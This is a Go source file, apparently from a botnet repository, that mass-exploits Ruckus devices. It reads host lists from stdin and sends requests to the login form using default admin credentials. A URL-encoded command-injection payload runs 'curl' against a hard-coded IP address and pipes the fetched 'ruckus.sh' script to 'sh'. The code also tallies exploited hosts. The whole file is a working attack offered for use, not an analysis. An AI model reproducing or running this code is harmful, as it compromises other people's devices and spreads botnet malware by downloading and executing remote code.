Path: blob/master/Botnets/Exploits/Ruckus/ruckus.go
5038 views
package main12import (3"bufio"4"fmt"5"net"6"net/http"7"os"8"runtime"9"strconv"10"strings"11"sync"12"time"13)1415var (16UrlPayload = "%24%28curl%20http%3A%2F%2F163.123.142.146%2Fruckus.sh%20%7C%20sh%29"17UrlPath = "/forms/doLogin?login_username=admin&password=admin"1819total int20exploited int21failed int2223wg sync.WaitGroup24)2526func SetConnTimeout(conn net.Conn, timeout time.Duration) error {27return conn.SetDeadline(time.Now().Add(timeout))28}2930func ExploitHost(host string) {31conn, err := net.Dial("tcp", host)32if err != nil {33failed++34return35}3637defer conn.Close()3839buf := make([]byte, 512)4041fmt.Fprintf(conn, "GET %s%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: Wget/1.17.1\r\n\r\n", UrlPath, UrlPayload, host)4243conn.Read(buf)4445if strings.Contains(string(buf), "200 OK") {46exploited++47}48}4950func ExploitHostHttps(host string) {51wg.Add(1)52defer wg.Done()5354req, err := http.Get(fmt.Sprintf("https://%s%s%s", host, UrlPath, UrlPayload))55if err != nil {56failed++57return58}5960if req.StatusCode == 200 {61exploited++62}63}6465func HandleHost(host string) {66total++67wg.Add(1)68defer wg.Done()6970go ExploitHost(host)71go ExploitHostHttps(host)72}7374func TitleWriter() {75i := 07677for {78time.Sleep(1 * time.Second)79i++80fmt.Printf("%d's total (%d) running (%d) exploited (%d) failed (%d)\r\n", i, total, runtime.NumGoroutine(), exploited, failed)81}82}8384func main() {85routines, _ := strconv.Atoi(os.Args[2])86scanner := bufio.NewScanner(os.Stdin)8788go TitleWriter()8990for scanner.Scan() {91for runtime.NumGoroutine() > routines {92time.Sleep(1 * time.Second)93}9495if os.Args[1] == "manual" {96go HandleHost(scanner.Text())97} else {98go HandleHost(scanner.Text() + ":" + os.Args[1])99}100}101102for runtime.NumGoroutine() > 1000 {103time.Sleep(1 * time.Second)104}105}106107108